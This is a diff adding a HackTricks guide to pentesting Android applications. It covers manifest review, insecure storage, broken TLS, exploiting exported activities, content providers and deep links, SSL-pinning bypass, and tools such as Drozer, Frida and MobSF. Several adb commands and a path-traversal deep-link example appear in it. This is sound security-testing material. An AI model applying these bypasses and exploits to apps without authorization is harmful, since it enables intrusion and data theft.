embed url="https://anhtai.me/oscp-fun-guide/" %} + + + diff --git a/mobile-apps-pentesting/android-app-pentesting/README.md b/mobile-apps-pentesting/android-app-pentesting/README.md new file mode 100644 index 00000000000..e4d64c0fce0 --- /dev/null +++ b/mobile-apps-pentesting/android-app-pentesting/README.md @@ -0,0 +1,685 @@ +# Android Applications Pentesting + +{% hint style="danger" %} +Do you use **Hacktricks every day**? Did you find the book **very** **useful**? Would you like to **receive extra help** with cybersecurity questions? Would you like to **find more and higher quality content on Hacktricks**? +[**Support Hacktricks through github sponsors**](https://github.com/sponsors/carlospolop) **so we can dedicate more time to it and also get access to the Hacktricks private group where you will get the help you need and much more!** +{% endhint %} + +If you want to know about my **latest modifications**/**additions** or you have **any suggestion for HackTricks** or **PEASS**, **join the** [**💬**](https://emojipedia.org/speech-balloon/)[**telegram group**](https://t.me/peass), or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** +If you want to **share some tricks with the community** you can also submit **pull requests** to [**https://github.com/carlospolop/hacktricks**](https://github.com/carlospolop/hacktricks) that will be reflected in this book and don't forget to **give ⭐** on **github** to **motivate** **me** to continue developing this book. + +## Android Applications Basics + +It's highly recommended to start reading this page to know about the **most important parts related to Android security and the most dangerous components in an Android application**: + +{% page-ref page="android-applications-basics.md" %} + +## ADB \(Android Debug Bridge\) + +This is the main tool you need to connect to an android device \(emulated or physical\). +It allows you to control your device over **USB** or **Network** from a computer, **copy** files back and forth, **install** and uninstall apps, run **shell** commands, perform **backups**, read **logs** and more. + +Take a look to the following list of [**ADB Commands**](adb-commands.md) _\*\*_to learn how to use adb. + +## Smali + +Sometimes it is interesting to **modify the application code** to access **hidden information** \(maybe well obfuscated passwords or flags\). Then, it could be interesting to decompile the apk, modify the code and recompile it. +[**In this tutorial** you can **learn how to decompile and APK, modify Smali code and recompile the APK** with the new functionality](smali-changes.md). This could be very useful as an **alternative for several tests during the dynamic analysis** that are going to presented. Then, **keep always in mid this possibility**. + +## Other interesting tricks + +* [Spoofing your location in Play Store](spoofing-your-location-in-play-store.md) +* **Download APKs**: [https://apps.evozi.com/apk-downloader/](https://apps.evozi.com/apk-downloader/), [https://apkpure.com/es/](https://apkpure.com/es/), [https://www.apkmirror.com/](https://www.apkmirror.com/), [https://apkcombo.com/es-es/apk-downloader/](https://apkcombo.com/es-es/apk-downloader/) + +## Static Analysis + +First of all, for analysing an APK you should **take a look to the to the Java code** using a decompiler. +Please, [**read here to find information about different available decompilers**](apk-decompilers.md). + +### Looking for interesting Info + +Just taking a look to the **strings** of the APK you can search for **passwords**, **URLs** \([https://github.com/ndelphit/apkurlgrep](https://github.com/ndelphit/apkurlgrep)\), **api** keys, **encryption**, **bluetooth uuids**, **tokens** and anything interesting... look even for code execution **backdoors** or authentication backdoors \(hardcoded admin credentials to the app\). + +#### Firebase + +Pay special attention to **firebase URLs** and check if it is bad configured. [More information about whats is FIrebase and how to exploit it here.](../../pentesting/pentesting-web/buckets/firebase-database.md) + +### Basic understanding of the application - Manifest.xml, strings.xml + +Using any of the **decompilers** mentioned [**here** ](apk-decompilers.md)you will be able to read the _Manifest.xml_. You could also **rename** the **apk** file extension **to .zip** and **unzip** it. +Reading the **manifest** you can find **vulnerabilities**: + +* First of all, check if **the application is debuggeable**. A production APK shouldn't be \(or others will be able to connect to it\). You can check if an application is debbugeable looking in the manifest for the attribute `debuggable="true"` inside the tag _<application_ Example: ` formation-software.co.uk ` +* **Exported activities**: Check for exported activities inside the manifest as this could be dangerous. Later in the dynamic analysis it will be explained how [you can abuse this behaviour](./#exploiting-exported-activities-authorisation-bypass). +* **Content Providers**: If an exported provider is being exposed, you could b able to access/modify interesting information. In dynamic analysis [you will learn how to abuse them](./#exploiting-content-providers-accessing-and-manipulating-sensitive-information). + * Check for **FileProviders** configurations inside the attribute `android:name="android.support.FILE_PROVIDER_PATHS"`. [Read here to learn more about FileProviders](./#fileprovider). +* **Exposed Services**: Depending on what the service is doing internally vulnerabilities could be exploited. In dynamic analysis [you will learn how to abuse them](./#exploiting-services). +* **Broadcast Receivers**: [You will learn how you can possibly exploit them](./#exploiting-broadcast-receivers) during the dynamic analysis. +* **URL scheme**: Read the code of the activity managing the schema and look for vulnerabilities managing the input of the user. More info about [what is an URL scheme here](./#url-schemes). +* **minSdkVersion**, **targetSDKVersion**, **maxSdkVersion**: They indicate the versions of Android the app will run on. It's important to keep them in mind because from a security perspective, supporting old version will allow known vulnerable versions of android to run it. + +Reading **resources.arsc/strings.xml** you can find some **interesting info**: + +* API Keys +* Custom schemas +* Other interesting info developers save in this file + +### Tapjacking + +**Tapjacking** is an attack where a **malicious** **application** is launched and **positions itself on top of a victim application**. Once it visibly obscures the victim app, its user interface is designed in such a way as to trick the user to interact with it, while it is passing the interaction along to the victim app. +In effect, it is **blinding the user from knowing they are actually performing actions on the victim app**. + +In order to detect apps vulnerable to this attacked you should search for **exported activities** in the android manifest \(note that an activity with an intent-filter is automatically exported by default\). Once you have found the exported activities, **check if they require any permission**. This is because the **malicious application will need that permission also**. +Finally, it's important to check the code for possible **`setFilterTouchesWhenObscured`** configurations. If set to **`true`**, a button can be automatically disabled if it is obscured: + +```markup + +``` + +You can use [**qark**](https://github.com/linkedin/qark) with the `--exploit-apk` parameter to create a malicious application to test for possible **Tapjacking** vulnerabilities. +A example project implementing this kind of feature can be fund in [**FloatingWindowApp**](https://github.com/aminography/FloatingWindowApp). + +The mitigation is relatively simple as the developer may choose not to receive touch events when a view is covered by another. Using the [Android Developer’s Reference](https://developer.android.com/reference/android/view/View#security): + +> Sometimes it is essential that an application be able to verify that an action is being performed with the full knowledge and consent of the user, such as granting a permission request, making a purchase or clicking on an advertisement. Unfortunately, a malicious application could try to spoof the user into performing these actions, unaware, by concealing the intended purpose of the view. As a remedy, the framework offers a touch filtering mechanism that can be used to improve the security of views that provide access to sensitive functionality. +> +> To enable touch filtering, call [`setFilterTouchesWhenObscured(boolean)`](https://developer.android.com/reference/android/view/View#setFilterTouchesWhenObscured%28boolean%29) or set the android:filterTouchesWhenObscured layout attribute to true. When enabled, the framework will discard touches that are received whenever the view's window is obscured by another visible window. As a result, the view will not receive touches whenever a toast, dialog or other window appears above the view's window. + +### Task Hijacking + +{% page-ref page="android-task-hijacking.md" %} + +### Insecure data storage + +#### Internal Storage + +Files **created** on **internal** storage are **accessible** only by the **app**. This protection is implemented by Android and is sufficient for most applications. But developers often use `MODE_WORLD_READBALE` & `MODE_WORLD_WRITABLE` to give access to those files to a different application, but this doesn’t limit other apps\(malicious\) from accessing them. +During the **static** analysis **check** for the use of those **modes**, during the **dynamic** analysis **check** the **permissions** of the files created \(maybe some of them are worldwide readable/writable\). +[More information about this vulnerability and how to fix it here.](https://manifestsecurity.com/android-application-security-part-8/) + +#### External Storage + +Files created on **external storage**, such as SD Cards, are **globally readable and writable**. Because external storage can be removed by the user and also modified by any application, you should **not store sensitive information using external storage**. +As with data from any untrusted source, you should **perform input validation** when handling **data from external storage**. We strongly recommend that you not store executables or class files on external storage prior to dynamic loading. If your app does retrieve executable files from external storage, the files should be signed and cryptographically verified prior to dynamic loading. +Info taken from [here](https://manifestsecurity.com/android-application-security-part-8/). + +External storage can be **accessed** in `/storage/emulated/0` , `/sdcard` , `/mnt/sdcard` + +{% hint style="info" %} +Starting with Android 4.4 \(**API 17**\), the SD card has a directory structure which **limits access from an app to the directory which is specifically for that app**. This prevents malicious application from gaining read or write access to another app's files. +{% endhint %} + +#### Sensitive data stored in clear-text + +* **Shared preferences**: Android allow to each application to easily save xml files in the path `/data/data//shared_prefs/` and sometimes it's possible to find sensitive information in clear-text in that folder. +* **Databases**: Android allow to each application to easily save sqlite databases in the path `/data/data//databases/` and sometimes it's possible to find sensitive information in clear-text in that folder. + +### Broken TLS + +#### Accept All Certificates + +For some reason sometimes developers accept all the certificates even if for example the hostname does not match with lines of code like the following one: + +```java +SSLSocketFactory sf = new cc(trustStore); +sf.setHostnameVerifier(SSLSocketFactory.ALLOW_ALL_HOSTNAME_VERIFIER); +``` + +A good way to test this is to try to capture the traffic using some proxy like Burp without authorising Burp CA inside the device. Also, you can generate with Burp a certificate for a different hostname and use it. + +### Broken Cryptography + +#### Poor Key Management Processes + +Some developers save sensitive data in the local storage and encrypt it with a key hardcoded/predictable in the code. This shouldn't be done as some reversing could allow attackers to extract the confidential information. + +#### Use of Insecure and/or Deprecated Algorithms + +Developers shouldn't use **deprecated algorithms** to perform authorisation **checks**, **store** or **send** data. Some of these algorithms are: RC4, MD4, MD5, SHA1... If **hashes** are used to store passwords for example, hashes brute-force **resistant** should be used with salt. + +### Other checks + +* It's recommended to **obfuscate the APK** to difficult the reverse engineer labour to attackers. +* If the app is sensitive \(like bank apps\), it should perform it's **own checks to see if the mobile is rooted** and act in consequence. +* If the app is sensitive \(like bank apps\), it should check if an **emulator** is being used. +* If the app is sensitive \(like bank apps\), it should **check it's own integrity before executing** it to check if it was modified. +* Use [**APKiD**](https://github.com/rednaga/APKiD) to check which compiler/packer/obfuscator was used to build the APK + +### React Native Application + +Read the following page to learn how to easily access javascript code of React applications: + +{% page-ref page="react-native-application.md" %} + +### Xamarin Applications + +**Xamarin** apps are written in **C\#**, in order to access the C\# code **decompressed,** you need to get the files from the **apk**: + +```bash +7z r app.apk #Or any other zip decompression cmd +``` + +Then, decompress all the DLsL using [**xamarin-decompress**](https://github.com/NickstaDB/xamarin-decompress)**:** + +```text +python3 xamarin-decompress.py -o /path/to/decompressed/apk +``` + + and finally you can use [**these recommended tools**](../../reversing/reversing-tools-basic-methods/#net-decompiler) to **read C\# code** from the DLLs. + +### Other interesting functions + +* **Code execution**: `Runtime.exec(), ProcessBuilder(), native code:system()` +* **Send SMSs**: `sendTextMessage, sendMultipartTestMessage` +* **Native functions** declared as `native`: `public native, System.loadLibrary, System.load` + * [Read this to learn **how to reverse native functions**](reversing-native-libraries.md) + +### **Other tricks** + +{% page-ref page="content-protocol.md" %} + +## Dynamic Analysis + +> First of all, you need an environment where you can install the application and all the environment \(Burp CA cert, Drozer and Frida mainly\). Therefore, a rooted device \(emulated or not\) is extremely recommended. + +### Online Dynamic analysis + +You can create a **free account** in: [https://appetize.io/](https://appetize.io/). This platform allows you to **upload** and **execute** APKs, so it is useful to see how an apk is behaving. + +You can even **see the logs of your application** in the web and connect through **adb**. + +![](../../.gitbook/assets/image%20%2823%29.png) + +Thanks to the ADB connection you can use **Drozer** and **Frida** inside the emulators. + +### Local Dynamic Analysis + +You can use some **emulator** like: + +* [**Android Studio**](https://developer.android.com/studio) **\(**You can create **x86** and **arm** devices, and according to [**this** ](https://android-developers.googleblog.com/2020/03/run-arm-apps-on-android-emulator.html)**latest x86** versions **support ARM libraries** without needing an slow arm emulator\). + * If you want to try to **install** an **image** and then you want to **delete it** you can do that on Windows:`C:\Users\\AppData\Local\Android\sdk\system-images\` or Mac: `/Users/myeongsic/Library/Android/sdk/system-image` + * This is the **main emulator I recommend to use and you can**[ **learn to set it up in this page**](avd-android-virtual-device.md). +* \*\*\*\*[**Genymotion**](https://www.genymotion.com/fun-zone/) **\*\*\(\_Free version:** Personal Edition**, you need to** create **an** account\*\*.\_\) +* \*\*\*\*[Nox](https://es.bignox.com/) \(Free, but it doesn't support Frida or Drozer\). + +{% hint style="info" %} +When creating a new emulator on any platform remember that the bigger the screen is, the slower the emulator will run. So select small screens if possible. +{% endhint %} + +As most people will use **Genymotion**, note this trick. To **install google services** \(like AppStore\) you need to click on the red marked button of the following image: + +![](../../.gitbook/assets/image%20%28100%29.png) + +Also, notice that in the **configuration of the Android VM in Genymotion** you can select **Bridge Network mode** \(this will be useful if you will be connecting to the Android VM from a different VM with the tools\). + +Or you could use a **physical** **device** \(you need to activate the debugging options and it will be cool if you can root it\): + +1. **Settings**. +2. \(FromAndroid 8.0\) Select **System**. +3. Select **About phone**. +4. Press **Build number** 7 times. +5. Go back and you will find the **Developer options**. + +> Once you have installed the application, the first thing you should do is to try it and investigate what does it do, how does it work and get comfortable with it. +> I will suggest to **perform this initial dynamic analysis using MobSF dynamic analysis + pidcat**, so will will be able to **learn how the application works** while MobSF **capture** a lot of **interesting** **data** you can review later on. + +### Unintended Data Leakage + +#### Logging + +Often Developers leave debugging information publicly. So any application with `READ_LOGS` permission can **access those logs** and can gain sensitive information through that. +While navigating through the application use [**pidcat**](https://github.com/JakeWharton/pidcat)_\(Recommended, it's easier to use and read_\) or [adb logcat](adb-commands.md#logcat) to read the created logs and **look for sensitive information**. + +{% hint style="warning" %} +Note that from l**ater versions that Android 4.0**, **applications are only able to access their own logs**. So applications cannot access other apps logs. +Anyway, it's still recommended to **not log sensitive information**. +{% endhint %} + +**Copy/Paste Buffer Caching** + +Android provides **clipboard-based** framework to provide copy-paste function in android applications. But this creates serious issue when some **other application** can **access** the **clipboard** which contain some sensitive data. **Copy/Paste** function should be **disabled** for **sensitive part** of the application. For example, disable copying credit card details. + +#### Crash Logs + +If an application **crashes** during runtime and it **saves logs** somewhere then those logs can be of help to an attacker especially in cases when android application cannot be reverse engineered. Then, avoid creating logs when applications crashes and if logs are sent over the network then ensure that they are sent over an SSL channel. +As pentester, **try to take a look to these logs**. + +#### Analytics Data Sent To 3rd Parties + +Most of the application uses other services in their application like Google Adsense but sometimes they **leak some sensitive data** or the data which is not required to sent to that service. This may happen because of the developer not implementing feature properly. You can **look by intercepting the traffic** of the application and see whether any sensitive data is sent to 3rd parties or not. + +### SQLite DBs + +Most of the applications will use **internal SQLite databases** to save information. During the pentest take a **look** to the **databases** created, the names of **tables** and **columns** and all the **data** saved because you could find **sensitive information** \(which would be a vulnerability\). +Databases should be located in `/data/data/the.package.name/databases` like `/data/data/com.mwr.example.sieve/databases` + +If the database is saving confidential information and is **encrypted b**ut you can **find** the **password** inside the application it's still a **vulnerability**. + +Enumerate the tables using `.tables` and enumerate the columns of the tables doing `.schema ` + +### Drozer \(Exploit Activities, Content Providers and Services\) + +**Drozer** allows you to **assume the role of an Android app** and interact with other apps. It can do **anything that an installed application can do**, such as make use of Android’s Inter-Process Communication \(IPC\) mechanism and interact with the underlying operating system. From [Drozer Guide](https://labs.mwrinfosecurity.com/assets/BlogFiles/mwri-drozer-user-guide-2015-03-23.pdf). +Drozer is s useful tool to **exploit exported activities, exported services and Content Providers** as you will learn in the following sections. + +### Exploiting exported Activities + +\*\*\*\*[**Read this if you want to remind what is an Android Activity.**](android-applications-basics.md#launcher-activity-and-other-activities) +_\*\*_Also remember that the code of an activity starts with the `onCreate` method. + +#### Authorisation bypass + +When an Activity is exported you can invoke its screen from an external app. Therefore, if an activity with **sensitive information** is **exported** you could **bypass** the **authentication** mechanisms **to access it.** +[**Learn how to exploit exported activities with Drozer.**](drozer-tutorial/#activities)\*\*\*\* + +You can also start an exported activity from adb: + +* PackageName is com.example.demo +* Exported ActivityName is com.example.test.MainActivity + +```text +adb shell am start -n com.example.demo/com.example.test.MainActivity +``` + +**NOTE**: MobSF will detect as malicious the use of _**singleTask/singleInstance**_ as `android:launchMode` in an activity, but due to [this](https://github.com/MobSF/Mobile-Security-Framework-MobSF/pull/750), apparently this is only dangerous on old versions \(API versions < 21\). + +{% hint style="info" %} +Note that an authorisation bypass is not always a vulnerability, it would depend on how the bypass works and which information is exposed. +{% endhint %} + +**Sensitive information leakage** + +**Activities can also return results**. If you manage to find an exported and unprotected activity calling the **`setResult`** method and **returning sensitive information**, there is a sensitive information leakage. + +### Exploiting Content Providers - Accessing and manipulating sensitive information + +\*\*\*\*[**Read this if you want to remind what is a Content Provider.**](android-applications-basics.md#content-provider) +Content providers are basically used to **share data**. If an app has available content providers you may be able to **extract sensitive** data from them. It also interesting to test possible **SQL injections** and **Path Traversals** as they could be vulnerable. +[**Learn how to exploit Content Providers with Drozer.**](drozer-tutorial/#content-providers)\*\*\*\* + +### **Exploiting Services** + +[**Read this if you want to remind what is a Service.**](android-applications-basics.md#services) +_\*\*_Remember that a the actions of a Service start in the method `onStartCommand`. + +As service is basically something that **can receive data**, **process** it and **returns** \(or not\) a response. Then, if an application is exporting some services you should **check** the **code** to understand what is it doing and **test** it **dynamically** for extracting confidential info, bypassing authentication measures... +[**Learn how to exploit Services with Drozer.**](drozer-tutorial/#services)\*\*\*\* + +### **Exploiting Broadcast Receivers** + +[**Read this if you want to remind what is a Broadcast Receiver.**](android-applications-basics.md#broadcast-receivers) +_\*\*_Remember that a the actions of a Broadcast Receiver start in the method `onReceive`. + +A broadcast receiver will be waiting for a type of message. Depending on ho the receiver handles the message it could be vulnerable. +[**Learn how to exploit Broadcast Receivers with Drozer.**](./#exploiting-broadcast-receivers) + +### **Exploiting Schemes / Deep links** + +You can look for deep links manually, using tools like MobSF or scripts like [this one](https://github.com/ashleykinguk/FBLinkBuilder/blob/master/FBLinkBuilder.py). +You can **open** a declared **scheme** using **adb** or a **browser**: + +```bash +adb shell am start -a android.intent.action.VIEW -d "scheme://hostname/path?param=value" [your.package.name] +``` + +_Note that you can **omit the package name** and the mobile will automatically call the app that should open that link._ + +```markup + +Click me + +with alternative +``` + +#### Code executed + +In order to find the **code that will be executed in the App**, go to the activity called by the deeplink and search the function **`onNewIntent`**. + +![](../../.gitbook/assets/image%20%28436%29%20%281%29%20%281%29.png) + +#### Sensitive info + +Every time you find a deep link check that i**t's not receiving sensitive data \(like passwords\) via URL parameters**, because any other application could **impersonate the deep link and steal that data!** + +#### Parameters in path + +You **must check also if any deep link is using a parameter inside the path** of the URL like: `https://api.example.com/v1/users/{username}` , in that case you can force a path traversal accessing something like: `example://app/users?username=../../unwanted-endpoint%3fparam=value` . +Note that if you find the correct endpoints inside the application you may be able to cause a **Open Redirect** \(if part of the path is used as domain name\), **account takeover** \(if you can modify users details without CSRF token and the vuln endpoint used the correct method\) and any other vuln. More [info about this here](http://dphoeniixx.com/2020/12/13-2/). + +#### More examples + +An [interesting bug bounty report](https://hackerone.com/reports/855618) about links \(_/.well-known/assetlinks.json_\). + +### Insufficient Transport Layer Protection + +* **Lack of Certificate Inspection:** Android Application fails to verify the identity of the certificate presented to it. Most of the application ignore the warnings and accept any self-signed certificate presented. Some Application instead pass the traffic through an HTTP connection. +* **Weak Handshake Negotiation:** Application and server perform an SSL/TLS handshake but use an insecure cipher suite which is vulnerable to MITM attacks. So any attacker can easily decrypt that connection. +* **Privacy Information Leakage:** Most of the times it happens that Applications do authentication through a secure channel but rest all connection through non-secure channel. That doesn’t add to security of application because rest sensitive data like session cookie or user data can be intercepted by an malicious user. + +From the 3 scenarios presented we are going to discuss **how to verify the identity of the certificate**. The other 2 scenarios depends on the **TLS configuratio**n of the server and if the **application sends unencrypted data**. The pentester should check by it's own the TLS configuration of the server \([here](../../pentesting/pentesting-web/#ssl-tls-vulnerabilites)\) and detect if any **confidential information is sent by an unencrypted/vulnerable** channel . +More information about how to discover and fix these kind of vulnerabilities [**here**](https://manifestsecurity.com/android-application-security-part-10/). + +#### SSL Pinning + +By default, when making an SSL connection, the client\(android app\) checks that the server’s certificate has a verifiable chain of trust back to a trusted \(root\) certificate and matches the requested hostname. This lead to problem of **Man in the Middle Attacks\(MITM\)**. +In certificate Pinnning, an Android Application itself contains the certificate of server and only transmit data if the same certificate is presented. +It's recommended to **apply SSL Pinning** for the sites where sensitive information is going to be sent. + +### Inspecting HTTP traffic + +First of all, you should \(must\) **install the certificate** of the **proxy** tool that you are going to use, probably Burp. If you don't install the CA certificate of the proxy tool, you probably aren't going to see the encrypted traffic in the proxy. +**Please,** [**read this guide to learn how to do install a custom CA certificate**](android-burp-suite-settings.md)**.** + +For applications targeting **API Level 24+ it isn't enough to install the Burp CA** certificate in the device. To bypass this new protection you need to modify the Network Security Config file. So, you could modify this file to authorise your CA certificate or you can **\*\*\[**read this page for a tutorial on how to force the application to accept again all the installed certificate sin the device**\]\(make-apk-accept-ca-certificate.md\)**.\*\* + +#### SSL Pinning + +We have already discuss what is SSL Pinning just 2 paragraphs before. When it's implemented in an application you will need to bypass it to inspect the HTTPS traffic or you won't see it. +Here I'm going to present a few options I've used to bypass this protection: + +* Automatically **modify** the **apk** to **bypass** SSLPinning with [**apk-mitm**](https://github.com/shroudedcode/apk-mitm). The best pro of this option, is that you won't need root to bypass the SSL Pinning, but you will need to delete the application and reinstall the new one, and this won't always work. +* You could use **Frida** \(discussed below\) to bypass this protection. Here you have a guide to use Burp+Frida+Genymotion: [https://spenkk.github.io/bugbounty/Configuring-Frida-with-Burp-and-GenyMotion-to-bypass-SSL-Pinning/](https://spenkk.github.io/bugbounty/Configuring-Frida-with-Burp-and-GenyMotion-to-bypass-SSL-Pinning/) +* You can also try to **automatically bypass SSL Pinning** using [**objection**](frida-tutorial/objection-tutorial.md)**:** `objection --gadget com.package.app explore --startup-command "android sslpinning disable"` +* You can also try to **automatically bypass SSL Pinning** using **MobSF dynamic analysis** \(explained below\) + +#### Common Web vulnerabilities + +Note that in this step you should look for common web vulnerabilities. A lot of information about web vulnerabilities be found in this book so I'm not going to mention them here. + +### Frida + +Dynamic instrumentation toolkit for developers, reverse-engineers, and security researchers. Learn more at [www.frida.re](https://www.frida.re/). +**It's amazing, you can access running application and hook methods on run time to change the behaviour, change values, extract values, run different code... +If you want to pentest Android applications you need to know how to use Frida.** + +**Learn how to use Frida:** [**Frida tutorial**](frida-tutorial/) +**Some "GUI" for actions with Frida:** [**https://github.com/m0bilesecurity/RMS-Runtime-Mobile-Security**](https://github.com/m0bilesecurity/RMS-Runtime-Mobile-Security) +**Some other abstractions based on Frida:** [**https://github.com/sensepost/objection**](https://github.com/sensepost/objection) **,** [**https://github.com/dpnishant/appmon**](https://github.com/dpnishant/appmon) +**You can find some Awesome Frida scripts here:** [**https://codeshare.frida.re/**](https://codeshare.frida.re/)\*\*\*\* + +### **Android Application Analyzer** + +This tool could help you managing different tools during the dynamic analysis: [https://github.com/NotSoSecure/android\_application\_analyzer](https://github.com/NotSoSecure/android_application_analyzer) + +### Intent Injection + +This vulnerability resembles **Open Redirect in web security**. Since class `Intent` is `Parcelable`, **objects belonging to this class** can be **passed** as **extra** **data** in another `Intent` object. +Many developers make **use** of this **feature** and create **proxy** **components** \(activities, broadcast receivers and services\) that **take an embedded Intent and pass it to dangerous methods** like `startActivity(...)`, `sendBroadcast(...)`, etc. +This is dangerous because **an attacker can force the app to launch a non-exported component that cannot be launched directly from another app**, or to grant the attacker access to its content providers. **`WebView`** also sometimes changes a **URL from a string to an `Intent`** object, using the `Intent.parseUri(...)` method, and passes it to `startActivity(...)`. + +### Android Client Side Injections and others + +Probably you know about this kind of vulnerabilities from the Web. You have to be specially careful with this vulnerabilities in an Android application: + +* **SQL Injection:** When dealing with dynamic queries or Content-Providers ensure you are using parameterized queries. +* **JavaScript Injection \(XSS\):** Verify that JavaScript and Plugin support is disabled for any WebViews \(disabled by default\). [More info here](webview-attacks.md#javascript-enabled). +* **Local File Inclusion:** Verify that File System Access is disabled for any WebViews \(enabled by default\) `(webview.getSettings().setAllowFileAccess(false);)`. [More info here](webview-attacks.md#javascript-enabled). +* **Eternal cookies**: In several cases when the android application finish the session the cookie isn't revoked or it could be even saved to disk +* \*\*\*\*[**Secure Flag** in cookies](../../pentesting-web/hacking-with-cookies.md#cookies-flags) + +## Automatic Analysis + +### [MobSF](https://github.com/MobSF/Mobile-Security-Framework-MobSF) + +#### Static analysis + +![](../../.gitbook/assets/image%20%2859%29.png) + +**Vulnerability assessment of the application** using a nice web-based frontend. You can also perform dynamic analysis \(but you need to prepare the environment\). + +```text +docker pull opensecurity/mobile-security-framework-mobsf +docker run -it -p 8000:8000 opensecurity/mobile-security-framework-mobsf:latest +``` + +Notice that MobSF can analyse **Android**\(apk\)**, IOS**\(ipa\) **and Windows**\(apx\) applications \(_Windows applications must be analyzed from a MobSF installed in a Windows host_\). +Also, if you create a **ZIP** file with the source code if an **Android** or an **IOS** app \(go to the root folder of the application, select everything and create a ZIPfile\), it will be able to analyse it also. + +MobSF also allows you to **diff/Compare** analysis and to integrate **VirusTotal** \(you will need to set your API key in _MobSF/settings.py_ and enable it: `VT_ENABLED = TRUE` `VT_API_KEY = ` `VT_UPLOAD = TRUE`\). You can also set `VT_UPLOAD` to `False`, then the **hash** will be **upload** instead of the file. + +### Assisted Dynamic analysis with MobSF + +**MobSF** can also be very helpful for **dynamic analysis** in **Android**, but in that case you will need to install MobSF and **genymotion** in your host \(a VM or Docker won't work\). _Note: You need to **start first a VM in genymotion** and **then MobSF.**_ +The **MobSF dynamic analyser** can: + +* **Dump application data** \(URLs, logs, clipboard, screenshots made by you, screenshots made by "**Exported Activity Tester**", emails, SQLite databases, XML files, and other created files\). All of this is done automatically except for the screenshots, you need to press when you want a screenshot or you need to press "**Exported Activity Tester**" to obtain screenshots of all the exported activities. +* Capture **HTTPS traffic** +* Use **Frida** to obtain **runtime** **information** + +From android **versions > 5**, it will **automatically start Frida** and will set global **proxy** settings to **capture** traffic. It will only capture traffic from the tested application. + +**Frida** + +By default, it will also use some Frida Scripts to **bypass SSL pinning**, **root detection** and **debugger detection** and to **monitor interesting APIs**. +MobSF can also **invoke exported activities**, grab **screenshots** of them and **save** them for the report. + +To **start** the dynamic testing press the green bottom: "**Start Instrumentation**". Press the "**Frida Live Logs**" to see the logs generated by the Frida scripts and "**Live API Monitor**" to see all the invocation to hooked methods, arguments passed and returned values \(this will appear after pressing "Start Instrumentation"\). +MobSF also allows you to load your own **Frida scripts \(**to send the results of your Friday scripts to MobSF use the function `send()`\). It also has **several pre-written scripts** you can load \(you can add more in `MobSF/DynamicAnalyzer/tools/frida_scripts/others/`\), just **select them**, press "**Load**" and press "**Start Instrumentation**" \(you will be able to see the logs of that scripts inside "**Frida Live Logs**"\). + +![](../../.gitbook/assets/image%20%28187%29.png) + +Moreover, you have some Auxiliary Frida functionalities: + +* **Enumerate Loaded Classes**: It will print all the loaded classes +* **Capture Strings**: It will print all the capture strings while using the application \(super noisy\) +* **Capture String Comparisons**: Could be very useful. It will **show the 2 strings being compared** and if the result was True or False. +* **Enumerate Class Methods**: Put the class name \(like "java.io.File"\) and it will print all the methods of the class. +* **Search Class Pattern**: Search classes by pattern +* **Trace Class Methods**: **Trace** a **whole class** \(see inputs and outputs of all methods of th class\). Remember that by default MobSF traces several interesting Android Api methods. + +Once you have selected the auxiliary module you want to use you need to press "**Start Intrumentation**" and you will see all the outputs in "**Frida Live Logs**". + +**Shell** + +Mobsf also brings you a shell with some **adb** commands, **MobSF commands**, and common **shell** **commands** at the bottom of the dynamic analysis page. Some interesting commands: + +```text +help +shell ls +activities +exported_activities +services +receivers +``` + +**HTTP tools** + +When http traffic is capture you can see an ugly view of the captured traffic on "**HTTP\(S\) Traffic**" bottom or a nicer view in "**Start HTTPTools**" green bottom. From the second option, you can **send** the **captured requests** to **proxies** like Burp or Owasp ZAP. +To do so, _power on Burp -->_ _turn off Intercept --> in MobSB HTTPTools select the request_ --> press "**Send to Fuzzer**" --> _select the proxy address_ \([http://127.0.0.1:8080\](http://127.0.0.1:8080\)\). + +Once you finish the dynamic analysis with MobSF you can press on "**Start Web API Fuzzer**" to **fuzz http requests** an look for vulnerabilities. + +{% hint style="info" %} +After performing a dynamic analysis with MobSF the proxy settings me be misconfigured and you won't be able to fix them from the GUI. You can fix the proxy settings by doing: + +```text +adb shell settings put global http_proxy :0 +``` +{% endhint %} + +### Assisted Dynamic Analysis with Inspeckage + +You can get the tool from [**Inspeckage**](https://github.com/ac-pm/Inspeckage). +This tool with use some **Hooks** to let you know **what is happening in the application** while you perform a **dynamic analysis**. + +{% page-ref page="inspeckage-tutorial.md" %} + +### [Yaazhini](https://www.vegabird.com/yaazhini/) + +This is a **great tool to perform static analysis with a GUI** + +![](../../.gitbook/assets/image%20%28466%29.png) + +### [Qark](https://github.com/linkedin/qark) + +This tool is designed to look for several **security related Android application vulnerabilities**, either in **source code** or **packaged APKs**. The tool is also **capable of creating a "Proof-of-Concept" deployable APK** and **ADB commands**, to exploit some of the found vulnerabilities \(Exposed activities, intents, tapjacking...\). As with Drozer, there is no need to root the test device. + +```bash +pip3 install --user qark # --user is only needed if not using a virtualenv +qark --apk path/to/my.apk +qark --java path/to/parent/java/folder +qark --java path/to/specific/java/file.java +``` + +### [**ReverseAPK**](https://github.com/1N3/ReverseAPK.git) + +* Displays all extracted files for easy reference +* Automatically decompile APK files to Java and Smali format +* Analyze AndroidManifest.xml for common vulnerabilities and behavior +* Static source code analysis for common vulnerabilities and behavior + * Device info + * Intents + * Command execution + * SQLite references + * Logging references + * Content providers + * Broadcast recievers + * Service references + * File references + * Crypto references + * Hardcoded secrets + * URL's + * Network connections + * SSL references + * WebView references + +```text +reverse-apk relative/path/to/APP.apk +``` + +### [SUPER Android Analyzer](https://github.com/SUPERAndroidAnalyzer/super) + +SUPER is a command-line application that can be used in Windows, MacOS X and Linux, that analyzes _.apk_ files in search for vulnerabilities. It does this by decompressing APKs and applying a series of rules to detect those vulnerabilities. + +All rules are centered in a `rules.json` file, and each company or tester could create its own rules to analyze what they need. + +Download the latest binaries from in the [download page](https://superanalyzer.rocks/download.html) + +```text +super-analyzer {apk_file} +``` + +### [StaCoAn](https://github.com/vincentcox/StaCoAn) + +![](../../.gitbook/assets/image%20%28303%29.png) + +StaCoAn is a **crossplatform** tool which aids developers, bugbounty hunters and ethical hackers performing [static code analysis](https://en.wikipedia.org/wiki/Static_program_analysis) on mobile applications\*. + +The concept is that you drag and drop your mobile application file \(an .apk or .ipa file\) on the StaCoAn application and it will generate a visual and portable report for you. You can tweak the settings and wordlists to get a customized experience. + +Download[ latest release](https://github.com/vincentcox/StaCoAn/releases): + +```text +./stacoan +``` + +### 